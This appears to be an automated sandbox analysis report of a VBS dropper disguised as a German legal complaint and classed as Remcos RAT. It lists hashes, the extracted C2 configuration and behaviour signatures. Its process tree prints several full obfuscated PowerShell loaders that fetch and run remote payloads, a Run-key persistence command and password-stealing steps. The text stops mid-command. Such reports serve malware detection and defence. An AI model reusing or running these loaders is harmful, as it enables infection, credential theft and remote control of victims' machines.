Overview

overview

10

Static

static

1

08102024_1...lt.vbs

windows7-x64

8

08102024_1...lt.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    40s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-10-2024 15:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    08102024_1541_Beschwerde-Rechtsanwalt.vbs

  • Size

    11KB

  • MD5

    a7f87588bc5a6ad03f79fa3085be9d28

  • SHA1

    c79dd84cd67b0846050b112ab4ce4b8c2f70794d

  • SHA256

    5700a6ed9522d53708f6e93c1303b25bcd9ede837dc6a5c62f929db1a8d4a59c

  • SHA512

    00dfd74685a88acb05970cfed07e5edbb605419f1ca4d8c0703ecb5dd436ef8b729c25bc5316e188d80c762a2f5b4a68a4b61b4dea8d7f1a50f477e76695bd21

  • SSDEEP

    192:RXVmQSH8ZNUYCxEXHnas8BK1gF8ylvACz74VT4DNIO+LtbA/ziLrRtEpDCBMjd/8:11SIxC+X91gZ/+pwz3wb

Score
10/10
remcospeewe8646collectiondiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

PeeWe8646

C2

www.autoshausamsachsenwald.de:6698

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Weepee83472-FSSJ2L

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\08102024_1541_Beschwerde-Rechtsanwalt.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4272
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frigrelsens Unomnisciently Uninnocent Abaxial Incorporates Lycopin Tanda #>;$Misanthrope='Foyerernes';<#Bratticer Kalispel Supercapable Frembringelsernes Determinate #>;$Prayer=$host.PrivateData;If ($Prayer) {$cantino++;}function forladelsens($Envisagement213){$Spurveungen=$Langtidsindstillede+$Envisagement213.Length-$cantino;for( $Ligfrd86=2;$Ligfrd86 -lt $Spurveungen;$Ligfrd86+=3){$Dusts='Systematisk';$Fenestella+=$Envisagement213[$Ligfrd86];}$Fenestella;}function Tvangsapparat($Varyler){ & ($Hedas) ($Varyler);}$Awellimiden127=forladelsens 'geMAsoBrzPaiM,lB.lFuaTr/Ko5 D. S0Sc Af( W riMen ed.hoEnwAtsAm ExN TT T No1.e0 M. 0re; e FrWThi Bn 6St4Hy;.l FixUd6Pr4B ;ti .rudvSe:Bu1 e2De1,o.L,0Hj) D AkGAre ocU k,poK /Su2Eu0Nr1An0Gr0H,1 D0T 1.p BlFEli arAteSuf poEuxK,/ a1Be2 1La.K 0Ro ';$Landboreforms=forladelsens 'A uReSA EB rRe-I aI gSieOpnR t P ';$Cuticula=forladelsens 'Boh.utF,tElp.tsid:Me/st/tawN,w Rw R.K a uAbt oPrhGga .u sUn-Frc SnS .mad leEt/G oEllXedCh/ amAroAnbNaiGoli e i/ BP,drSie.ve nV sUn. FaFyaSmfCa ';$Ludder=forladelsens ' L>I ';$Hedas=forladelsens ',pISeeBixF ';$Underbegrebhs='Frags';$Haglbsserne='\Refleksbevgelsen.Owl';Tvangsapparat (forladelsens ' S$ Sg ol To.rbTaa olSk: lN me Nd SsF v BlKng feCerOn=En$TreEnnBevPa: ma RpRapSmdFoaHyt Va K+M $OmH uaFogDulB,b Hs es.ieGarDyn e ');Tvangsapparat (forladelsens 'Ic$TagDrl loKubGlaInlN,: SBB,rCre UpEniHanJudR.e UnGleKr=Ma$BiCSkuBet i ecBiuDilEka R. .sP p lCuiVatWa(Fr$KlL u Hd Bd KeAurSc) U ');Tvangsapparat (forladelsens 'Mu[D N BeGetPl. oSD.e,irRev Vi UcG eU.P o aiBanKat,eMJaaInn.aaPrg NeK r .] o: r:KbS eancTeuBjrIniRutKvy.ePDirPio FtXio cUno ClBo Tr= F Qu[WiN,peIltCh.SeSHye mcReuG r DiKotMyyFuPSkrCooNetTioSkc MoMyl MTBey.rp CeUn]il: :HaTA.l asO 1V 2P ');$Cuticula=$Brepindene[0];$oophorectomy=(forladelsens 'ho$UnG fLShoFlb GAFoL,t:s.G oe nOoi pNF d OKAfAJdl DdCuE e=NeNFoe iW -,uOPyBBrJ EKvCB,TAl ,rS,tY Cs PtCee M ,. Onbee,xtB .Ovw ePlbAkCBalOpi AElenSyTHy ');Tvangsapparat ($oophorectomy);Tvangsapparat (forladelsens 'O $ GPoemenAriHonildGakTraT l NdT.eta.GrHfie,taPodMae UrPosSt[Fe$VrLE aGan vdTebReo Cr,eeSpf ,o nrG,mU,sG.]S =hv$LeAThwSmePllPllini.am uiMidbee GnYd1Sa2re7Em ');$Astipulation=forladelsens 'Re$ UGUieThnTeiUnn edS.kUnaEdl edV.e A.GeDTro wB nH.lEpo MaHodTrFDaiDalVieOr(Vi$InCSkuOrt .isyc DuS l Sa,t, O$NaSIck.iiFln kn e,drLan.eeYo)Sy ';$Skinnerne=$Nedsvlger;Tvangsapparat (forladelsens 'e $,igA lG OVlB A bl ,:SuO TVPoetoR ONbieFeaWiTfo= p(C TCrEHes PTTj- IpLiA LtEgH o Ka$OcsBhK I kNClNB,e HrVanBaeBe)F, ');while (!$Overneat) {Tvangsapparat (forladelsens 'Dr$Dog Alsoo FbHeaAul.e:MoR,oe Ud MnSti anSigFas TkBuo UrAnp usSpe anAtepasRd= e$Dnt sr nuFoeCh ') ;Tvangsapparat $Astipulation;Tvangsapparat (forladelsens '.yST,tDraprrFatS.- AS ldievaeRupSe A4A ');Tvangsapparat (forladelsens 'Op$R gAxlBeoPabEla Ulin: SOK vBreC rdinT eBoavatka=Hi(FaTF,ekesDrt i-AnPU aAntMahba Fr$LiSmokP.i n RnRee,ir rnbae ) B ') ;Tvangsapparat (forladelsens 'Sc$ ,gHil.eo.hburaLnl C: ILTeeU t hmBae itSaaFul l Serer osDu=Vi$PigSll ao Lb a l,a: TOBem NkKal ,aL.sCosPhiGofP,iNicSveGrrIliEpnSug AeBerN,sDe+Su+,o%Ad$A.BS,rCleExp niU,n GdSteOsnEbe a.LecDyo Ru mn.etS ') ;$Cuticula=$Brepindene[$Letmetallers];}$Filmundergrund60=350404;$Rysteturenes=28134;Tvangsapparat (forladelsens 'W $O gC.lFoo ib.yaoblk : SS UkBioSnv,asIn2 U7 l U =.r ,rGcoe AtFj-,vCA o onCetSke nBrt p Gr$ kSCokPoiThn Zn,ae ArElnF,eCa ');Tvangsapparat (forladelsens 'Va$KugKalOvoD bT aRelU : aJ ,u arPe K=Av B [S SSty FsLotlie.emU,. rCafoPonD vSpeElrGetUn]Em:to:SuFd rEvo SmSiBCoaNasP.eAf6 O4hjSAptB r iM nPag N(Un$ZiSE kVio vT.sHu2Sn7 C)Pa ');Tvangsapparat (forladelsens 'A $F.gmolProG.bG.aLal f:SeC h ou nfTrfByiImeD,rBi Hj=Su .l[AcSM.yeksY,t veOpm T.PyT,ee Rx ct T.VoEt,nToc.no dCli Gn rgme]Pa:Ha:,bA KSI CNoIGaIRh.RiGMeeTrt KSAntSkrEgiK nPig C(Bo$OuJ uStrAd)P, ');Tvangsapparat (forladelsens 'Sm$Beg alH,oKnbDuaHel U:FeL UeAmg,ri kssklAna tByoExr F1 h5,r3Do= b$EkCHehCeuU fN fExiUneForFr.R.sTruPab.isDetSir eitin.igRi(K $ LFSiiSal .mTeu .nPrdCoeEfrBrgTyrBeu Fn dEu6Ap0 ,Fo$UdRFoy bs ot ,eF t UuCorS eUnndae Ss o),r ');Tvangsapparat $Legislator153;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1408
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Frigrelsens Unomnisciently Uninnocent Abaxial Incorporates Lycopin Tanda #>;$Misanthrope='Foyerernes';<#Bratticer Kalispel Supercapable Frembringelsernes Determinate #>;$Prayer=$host.PrivateData;If ($Prayer) {$cantino++;}function forladelsens($Envisagement213){$Spurveungen=$Langtidsindstillede+$Envisagement213.Length-$cantino;for( $Ligfrd86=2;$Ligfrd86 -lt $Spurveungen;$Ligfrd86+=3){$Dusts='Systematisk';$Fenestella+=$Envisagement213[$Ligfrd86];}$Fenestella;}function Tvangsapparat($Varyler){ & ($Hedas) ($Varyler);}$Awellimiden127=forladelsens 'geMAsoBrzPaiM,lB.lFuaTr/Ko5 D. S0Sc Af( W riMen ed.hoEnwAtsAm ExN TT T No1.e0 M. 0re; e FrWThi Bn 6St4Hy;.l FixUd6Pr4B ;ti .rudvSe:Bu1 e2De1,o.L,0Hj) D AkGAre ocU k,poK /Su2Eu0Nr1An0Gr0H,1 D0T 1.p BlFEli arAteSuf poEuxK,/ a1Be2 1La.K 0Ro ';$Landboreforms=forladelsens 'A uReSA EB rRe-I aI gSieOpnR t P ';$Cuticula=forladelsens 'Boh.utF,tElp.tsid:Me/st/tawN,w Rw R.K a uAbt oPrhGga .u sUn-Frc SnS .mad leEt/G oEllXedCh/ amAroAnbNaiGoli e i/ BP,drSie.ve nV sUn. FaFyaSmfCa ';$Ludder=forladelsens ' L>I ';$Hedas=forladelsens ',pISeeBixF ';$Underbegrebhs='Frags';$Haglbsserne='\Refleksbevgelsen.Owl';Tvangsapparat (forladelsens ' S$ Sg ol To.rbTaa olSk: lN me Nd SsF v BlKng feCerOn=En$TreEnnBevPa: ma RpRapSmdFoaHyt Va K+M $OmH uaFogDulB,b Hs es.ieGarDyn e ');Tvangsapparat (forladelsens 'Ic$TagDrl loKubGlaInlN,: SBB,rCre UpEniHanJudR.e UnGleKr=Ma$BiCSkuBet i ecBiuDilEka R. .sP p lCuiVatWa(Fr$KlL u Hd Bd KeAurSc) U ');Tvangsapparat (forladelsens 'Mu[D N BeGetPl. oSD.e,irRev Vi UcG eU.P o aiBanKat,eMJaaInn.aaPrg NeK r .] o: r:KbS eancTeuBjrIniRutKvy.ePDirPio FtXio cUno ClBo Tr= F Qu[WiN,peIltCh.SeSHye mcReuG r DiKotMyyFuPSkrCooNetTioSkc MoMyl MTBey.rp CeUn]il: :HaTA.l asO 1V 2P ');$Cuticula=$Brepindene[0];$oophorectomy=(forladelsens 'ho$UnG fLShoFlb GAFoL,t:s.G oe nOoi pNF d OKAfAJdl DdCuE e=NeNFoe iW -,uOPyBBrJ EKvCB,TAl ,rS,tY Cs PtCee M ,. Onbee,xtB .Ovw ePlbAkCBalOpi AElenSyTHy ');Tvangsapparat ($oophorectomy);Tvangsapparat (forladelsens 'O $ GPoemenAriHonildGakTraT l NdT.eta.GrHfie,taPodMae UrPosSt[Fe$VrLE aGan vdTebReo Cr,eeSpf ,o nrG,mU,sG.]S =hv$LeAThwSmePllPllini.am uiMidbee GnYd1Sa2re7Em ');$Astipulation=forladelsens 'Re$ UGUieThnTeiUnn edS.kUnaEdl edV.e A.GeDTro wB nH.lEpo MaHodTrFDaiDalVieOr(Vi$InCSkuOrt .isyc DuS l Sa,t, O$NaSIck.iiFln kn e,drLan.eeYo)Sy ';$Skinnerne=$Nedsvlger;Tvangsapparat (forladelsens 'e $,igA lG OVlB A bl ,:SuO TVPoetoR ONbieFeaWiTfo= p(C TCrEHes PTTj- IpLiA LtEgH o Ka$OcsBhK I kNClNB,e HrVanBaeBe)F, ');while (!$Overneat) {Tvangsapparat (forladelsens 'Dr$Dog Alsoo FbHeaAul.e:MoR,oe Ud MnSti anSigFas TkBuo UrAnp usSpe anAtepasRd= e$Dnt sr nuFoeCh ') ;Tvangsapparat $Astipulation;Tvangsapparat (forladelsens '.yST,tDraprrFatS.- AS ldievaeRupSe A4A ');Tvangsapparat (forladelsens 'Op$R gAxlBeoPabEla Ulin: SOK vBreC rdinT eBoavatka=Hi(FaTF,ekesDrt i-AnPU aAntMahba Fr$LiSmokP.i n RnRee,ir rnbae ) B ') ;Tvangsapparat (forladelsens 'Sc$ ,gHil.eo.hburaLnl C: ILTeeU t hmBae itSaaFul l Serer osDu=Vi$PigSll ao Lb a l,a: TOBem NkKal ,aL.sCosPhiGofP,iNicSveGrrIliEpnSug AeBerN,sDe+Su+,o%Ad$A.BS,rCleExp niU,n GdSteOsnEbe a.LecDyo Ru mn.etS ') ;$Cuticula=$Brepindene[$Letmetallers];}$Filmundergrund60=350404;$Rysteturenes=28134;Tvangsapparat (forladelsens 'W $O gC.lFoo ib.yaoblk : SS UkBioSnv,asIn2 U7 l U =.r ,rGcoe AtFj-,vCA o onCetSke nBrt p Gr$ kSCokPoiThn Zn,ae ArElnF,eCa ');Tvangsapparat (forladelsens 'Va$KugKalOvoD bT aRelU : aJ ,u arPe K=Av B [S SSty FsLotlie.emU,. rCafoPonD vSpeElrGetUn]Em:to:SuFd rEvo SmSiBCoaNasP.eAf6 O4hjSAptB r iM nPag N(Un$ZiSE kVio vT.sHu2Sn7 C)Pa ');Tvangsapparat (forladelsens 'A $F.gmolProG.bG.aLal f:SeC h ou nfTrfByiImeD,rBi Hj=Su .l[AcSM.yeksY,t veOpm T.PyT,ee Rx ct T.VoEt,nToc.no dCli Gn rgme]Pa:Ha:,bA KSI CNoIGaIRh.RiGMeeTrt KSAntSkrEgiK nPig C(Bo$OuJ uStrAd)P, ');Tvangsapparat (forladelsens 'Sm$Beg alH,oKnbDuaHel U:FeL UeAmg,ri kssklAna tByoExr F1 h5,r3Do= b$EkCHehCeuU fN fExiUneForFr.R.sTruPab.isDetSir eitin.igRi(K $ LFSiiSal .mTeu .nPrdCoeEfrBrgTyrBeu Fn dEu6Ap0 ,Fo$UdRFoy bs ot ,eF t UuCorS eUnndae Ss o),r ');Tvangsapparat $Legislator153;"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of NtCreateThreadExHideFromDebugger
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:440
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "opkrves" /t REG_EXPAND_SZ /d "%Formicarium% -windowstyle 1 $Asminderd14=(gp -Path 'HKCU:\Software\Velvillig\').Glunimie;%Formicarium% ($Asminderd14)"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4492
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "opkrves" /t REG_EXPAND_SZ /d "%Formicarium% -windowstyle 1 $Asminderd14=(gp -Path 'HKCU:\Software\Velvillig\').Glunimie;%Formicarium% ($Asminderd14)"
        3⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:2984
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Bedstevennens.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3580
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -windowstyle hidden "<#Surtouts Metalkiste Folium #>;$Opholdte231='Zenography';<#Anstand Misvouched Modelled Otmar Riffelgang #>;$Tilvristes=$Scrimshanker23+$host.UI;If ($Tilvristes) {$Rommy212++;}function Nonreceptively($lndstatistikkens){$Forringelsens212=$Tommestokkene+$lndstatistikkens.Length-$Rommy212; for( $Hjaelpefunktion242=2;$Hjaelpefunktion242 -lt $Forringelsens212;$Hjaelpefunktion242+=3){$Kller='Murmuringly222';$Partshringen+=$lndstatistikkens[$Hjaelpefunktion242];$pisachi='Turnering';}$Partshringen;}function Sekundovioliners162($Cardionosus){ . ($Prevented) ($Cardionosus);}$Nonscrutiny=Nonreceptively ' BMGro zSui .ltelVras /Co5Da.Fr0My .r( SWAsiOvn AdVaoSyw sCa kNDeT S 1Un0 . ,0 r;pa edWBaiB nCh6.o4Be;O .ex D6R 4De;R GrrB v v: F1 P2G 1Th. P0Li)Kl FoGObe.ic.akDeoS./ha2Ln0E 1 F0Su0 e1Nr0Un1 TrFBei lr SeInfScoLux.u/St1Ed2St1Tr.Ne0Ka ';$Afretters=Nonreceptively ' uUAms SeFirSh- Ta tGGre RN TUl ';$Noration252=Nonreceptively 'Smh KtBrtT pKosPr:No/Sa/ cw Rw hwE .RefIna HsK,thoa Fn sk EaU uMifC . IdHue /MoG Da pjSa.Dil,upP.k B ';$Densitometre=Nonreceptively 'Fa> R ';$Prevented=Nonreceptively 'leIEkEDexCr ';$Krigssituationens='Mngderabats';$Cadillo='\Alkyds.jen';Sekundovioliners162 (Nonreceptively 'Sl$ G .lIdO.nbMiAF,LSt:,ybskLTea ,rUni ,nAfaSe= o$ aeCen ,vLi:T a FpP P ud aChtGuASt+So$ hcPea.ads.i ilB LReO.i ');Sekundovioliners162 (Nonreceptively 'L $BeGTilBioMaBC,a LS.:.eAEvUSlt,uoOnPPahProF,TPro TMNaE CtUnR pySa=Op$ Pn .omarNyAAstapi aobonMa2K,5St2A..udSUnp ,L MIVat n(Ta$ BdFreeunfjsPri.etH,OJamH.EentUdRH ede) E ');Sekundovioliners162 (Nonreceptively 'Cy[RenR,EP,tTi. es TeInRFovPaIP c tE DPSto uISlnIdTYeMG a nN AShg e lRLa]op:Br: sBuE DCUnuR r iInTSeYefPRurBoOStTBeOggCUrOt l . =Do Et[Fen ReSat ,.FisAlE nCHeuSkrGaiCiT Ybup rNgo,jTFrOEkc hO aL tb y pN.ePr]Fl:an: iTReLe S C1Gu2Fr ');$Noration252=$autophotometry[0];$Terebrate=(Nonreceptively ' K$TeGFolK.o,lB .a,eLDe:PrFEnu hN.iA PM DBTeUSvL SAN TLaIC NRoG B=ViNhyEFlW a-faoFib .jbrEGuc TAr S s aYAsS,ntC,EInm T.BaNFlEBit.t.StWPoe AbkuC bL TiCieD NKotDe ');Sekundovioliners162 ($Terebrate);Sekundovioliners162 (Nonreceptively ' U$ lF Su mnToaOumBobGruMul KaPrtmoiRen CgEv.T HBle aArdIce Vr.ms O[ M$P,A IfT.r neCatIntE,eF.r,rs,n]Re=Sy$BeNFooP nTvs icdrrGauFot SiSonH yPr ');$Craniopuncture=Nonreceptively 'sk$ nF MuR nN,a tmMebAfu SlCoaUdtVei nUsgBr. MDChoT w,enSal oo yanudTrFPri VlO.eU.( ,$ ENBooCorUna,otA,iOvo WnFo2B 5S 2C,, $,kP ohFeoOpn yeUnmSueF sSt)G. ';$Phonemes=$Blarina;Sekundovioliners162 (Nonreceptively ' u$,nGOvLFoO bTiA AL H:Raf dRBaiC MR,RS KHoeSkH a TnSmD aLdaEWarO nAcE s .2 a4 A3Ha=,e(,oTa eBlSS,TEx- Pp CAMutSoh.i Re$ CpGuH CoOdNBoE umSyEOus )Md ');while (!$Frimrkehandlernes243) {Sekundovioliners162 (Nonreceptively ' i$FigSklBaoOub,raSylEd: .U dKadPreG lCei HgB,e Rs.e=.i$P tV r LuKue H ') ;Sekundovioliners162 $Craniopuncture;Sekundovioliners162 (Nonreceptively ' s MtUnABoRDeTT.-haSn,L ,e EOvPSi Re4Ni ');Sekundovioliners162 (Nonreceptively 'ex$JuGcaLStO AbDiaC,lgr:M F,irs I PMQ,RB KBeEK h AFonSkd ,Lpre mRTrN iEF.sCo2Ru4We3A = P(FrT eBaS Ct C- rp .A TQuH S Mi$E PSnhS OCrn,ae dMSieDesCh) ') ;Sekundovioliners162 (Nonreceptively 'C,$AuGArlr o SBPra,elRu:UnIRoNSitFoeSaRTeb .RAie taStT FhD =Ha$CoGTulBoONabFoA.llGa: d Se.onDaa eT uLir aETrr iJuN TG uSInMBlIPsdC LF EAnt SI,+Un+ P%S.$GoaRauUfTMuoSlpMehNaO iTCoO Rm .ESntQurD y e. Dc eoAiu oN.aTD. ') ;$Noration252=$autophotometry[$Interbreath];}$Superieure=333021;$Unmeet=29044;Sekundovioliners162 (Nonreceptively 'Ma$DeGEfl pO rb.rA lu.: GYtaChrFoD oEKoRF.KMoafaSN EWrRI,n GE .R P Af= L FlG lEimTUn-KrCWaoClNEnTM e iNBat.u Im$P pOph o .nAlEOvm NeDos,f ');Sekundovioliners162 (Nonreceptively 'P $S,gMal.voglbs.asulAn:H BS uFonAndBeb .r It Ps.n Or= O G.[ rS AyhesDrtPye,omV,.S,C Eo JnDev IeA rDitSa] a:Wa:whFCurCyoMamBlBWaa KsAueKl6 ,4 lS it Gr i GnmegTv(,t$D GAna Tr.mdCaeS rGlkTiaAfs ueCorBun.oe.arC.)be ');Sekundovioliners162 (Nonreceptively 'Ch$SuGT LCaOExB .aUdlDa:IwY dUdeHurDel I.og gRea AGie anHed.eEBlS.e =So Da[KvsLoYG sKitUnEC mSt.PatpiEc,x iTS .jue,eNmactjOMoDKoiOun cGd ]En:P.:xaATosHec eIK,iRe. DG ,eHat .S et BrH,iS.NAkgCh(U $PoBTuuL nF df BGirNaTIlsSi)Bi ');Sekundovioliners162 (Nonreceptively 'Si$ SgFelM.O iBOmaTalP :Idm,ea,uGBinLuISpSN.7.i4An=Ov$Joy d.neanR eL rIHogn gOua oAEfE,inl dp.E FS .GosCou SBMoSEnTUdr iCon.igRe(Fa$Dos SUI pS.E,ar SiBoEVeuAnrH e e,L,$ UKinUnM eeFreA T B) . ');Sekundovioliners162 $Magnis74;"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3804
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\efaxytwmxfhaejfkucgdf"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      PID:4088
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\ozfqzlholnzfgpboleteqhzkp"
      2⤵
      • Accesses Microsoft Outlook accounts
      • System Location Discovery: System Language Discovery
      PID:5096
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\qbkbaerhzvrsqdpsupfgtuubydom"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1612
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Objektiviseringens.vbs"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3300
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Oui Kroniske Relaster #>;$Tykkammenes='Boraciferous';<#Mnstergyldigt Obtruded Preinserts Cabbies Forktringers #>;$Aeroduct=$Opkbenes+$host.UI;If ($Aeroduct) {$Aktieindsigtens++;}function Resborgerne($Rica){$Rendyrker=$Tensibly88+$Rica.Length-$Aktieindsigtens; for( $Wame=2;$Wame -lt $Rendyrker;$Wame+=3){$Snketunnel='Scog';$Disjune+=$Rica[$Wame];$Yenning='Amtsborgmesterens';}$Disjune;}function Patarine($Defoggers){ & ($Midstroke) ($Defoggers);}$Quinamidin=Resborgerne 'G.MLeo zFoiSpl l NaSm/Sk5Re.Ha0.l Mi(JoW i enT,dGuoM,w es y CeN hTM ,1Ta0Un. H0Ps;O hW iAsnB 6Tz4Mu; O AfxPy6Ge4 ;.o ParB,vAf:Ex1Tu2 S1Li.Gi0mi)d. S G Ke,mcRakC oS,/ S2 P0 1 0D.0Li1 o0pi1 r JoFPliK rO,escfSuoWixG /ti1Ku2U 1P . .0bi ';$Eukalyptussen=Resborgerne 'Nou.lsunESaRTe-,hat garE aNPat B ';$Verged=Resborgerne 'TrhTytSatkjp Askn: i/Ca/ FwfowMawBl.TufF ahesPotL.aEfnDik oaTouT,f . VdE eSv/ChUPorCleA t Pf r dTuiAlg,hh,ne.kdQueO,n M.S adacSaaT ';$Manettes=Resborgerne ' s>Ni ';$Midstroke=Resborgerne 'b itrEG xO ';$Redispersed='Umulige';$Kilowatttimer='\Redbuds.Dip';Patarine (Resborgerne 'Ma$SkGDrlB oSebdia lS.:I,c,dlC.Y SFlT.gES RHa1Mu2F,3Kl=Sp$ .e Jn,avTe: PA OpR,P.hdstaPeTs AHe+ M$ TkU iP,LAkOS wOpa oTF,TCoT ,IJoM ,eSkrW ');Patarine (Resborgerne 'Sl$TygKoLKoO Pb oa LFo:BuS BLU,iO tteH Oe RrP y =Mi$DrV nE .R CGL,eSlD a. NSSlPheLS,I,ttPo( e$GamI AUnnEpe EtteT OEO.s a)La ');Patarine (Resborgerne 'Tr[PoN.reP TSt.S S,rECaR SvNoiLaCIneEppStoMoIGaNAmT Tm Ca FNAgA TgRee rPr] E:Va: USTrEKocNauJor DiAft y Vp SrIno yTLioHjCA.o KLKo Su= D Pa[ en,aegotMo. SBiE ScBru orSyI iT uYasp,or o.nT loBaC O RLAlT fyBapPreSh]Ch:B :OrT FlS s 1Vh2Ly ');$Verged=$Slithery[0];$Skjolddragers=(Resborgerne 'Mi$ UgMlLFlOl BF aD Lcr:FlPLeh BeTanHaaYac,ieKatEdiDun ie,y= .nToEArWFr-R.o bN jAmeR CemTTr FjsRuYQuS ktDeEKomPh.TinL.e FTGu.HaW DeSvbOvc vlAliNieO NAbTRa ');Patarine ($Skjolddragers);Patarine (Resborgerne 'No$TePRhh .eBan iaZicD e et iNan.beRe.,nHFee Ma Adane.or os C[e $DiERau lk BaU,lStySupNotHou.os isB eSenFr] n=As$AcQReuOmiinn Aal m .iRadtiiLinNo ');$Tampen=Resborgerne 'Fo$B PTeh,geRen Ea bcbie tLeiFin Fe r.UnDAfoMiwStn Ul noApaSkd CFh.i Sl OeUd(Fy$ CVm eB rCag,ceTrd,q,gr$.lSPaoBalTee nsu),r ';$Solen=$Clyster123;Patarine (Resborgerne 'C $KogSkLHeoReb .A ,LT.: URAwaAnAUndUnGUnI.ev ,nExIfiN gRaE enM sF =Ca(S TBaEOvs DtCo-PrP pa itFuhKi De$VuS.uoB L,oe kN .) o ');while (!$Raadgivningens) {Patarine (Resborgerne ' $ZugTrl Oo Fb oaCil p:KfRPhdPon,ri nSugReeTrnse=Hj$EmtHur AuR eOp ') ;Patarine $Tampen;Patarine (Resborgerne 'BlSSeT oA rRUnTV - Rs lSoeheEPaP A Fn4sw ');Patarine (Resborgerne 'Mu$S gTrlAlO,tB Sa FL t: AR ua KaV D GStiCaVAdn EIInn CG OEMaN ES n=Sa(FoT sEPasWitM - DpSpa tNehSt J $Unsa osllB EHanPo)M ') ;Patarine (Resborgerne 'Ja$ egMeLsyo Db A il t:FosInoFiLUdkF.rOdegimB eC RAr=S,$KlGFlLPioSyB oANelTi: VSN o VMInn DoB,lSlEopSPeCKae EN rTFl+ U+ a%fo$ os L yIstTPoHFeEAsr .yIm.SkcBoo huCrn STCo ') 